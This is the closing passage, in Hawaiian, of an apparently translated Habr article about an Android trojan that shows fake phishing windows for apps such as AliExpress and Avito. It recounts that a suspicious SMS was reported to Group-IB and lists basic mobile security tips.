Ma muli o ka polokalamu e holo nei, e hōʻike ʻia nā puka makani phishing like ʻole. Aia ma lalo nā laʻana o kekahi o lākou:
AliExpress:
Avito:
No kekahi mau noi ʻē aʻe, e.g. Google Play Market, Aviasales, Pandao, Hoʻopaʻa, Trivago:
Pehea maoli
ʻO ka mea pōmaikaʻi, ʻo ka mea i loaʻa i ka leka SMS i wehewehe ʻia ma ka hoʻomaka ʻana o ka ʻatikala i lilo i mea loea cybersecurity. No laila, ʻokoʻa ka mana maoli, ʻaʻole alakaʻi i ka mea i haʻi mua ʻia: ua loaʻa i kahi kanaka kahi SMS hoihoi, a laila hāʻawi ʻo ia i ka hui Group-IB Threat Hunting Intelligence. ʻO ka hopena o ka hoʻouka ʻana ʻo kēia ʻatikala. Hauʻoli ka hopena, ʻeā? Akā naʻe, ʻaʻole i pau nā moʻolelo a pau me ka kūleʻa, a i ʻole like kāu moʻolelo e like me ka ʻoki ʻana o ke alakaʻi me ka nalowale o ke kālā, ma ka hapanui o nā hihia ua lawa ia e mālama i nā lula i wehewehe lōʻihi ʻia:
- mai hoʻokomo i nā noi no ka polokalamu kelepona me Android OS mai nā kumu ʻē aʻe ma waho o Google Play
- Ke kau ʻana i kahi noi, e nānā pono i nā kuleana i noi ʻia e ka noi
- e hoʻolohe i nā hoʻonui o nā faila i hoʻoiho ʻia
- e hoʻouka mau i nā mea hou o Android OS
- mai kipa i nā kumuwaiwai kānalua a mai hoʻoiho i nā faila mai laila
- Mai kaomi i nā loulou i loaʻa ma nā leka SMS.
Source: www.habr.com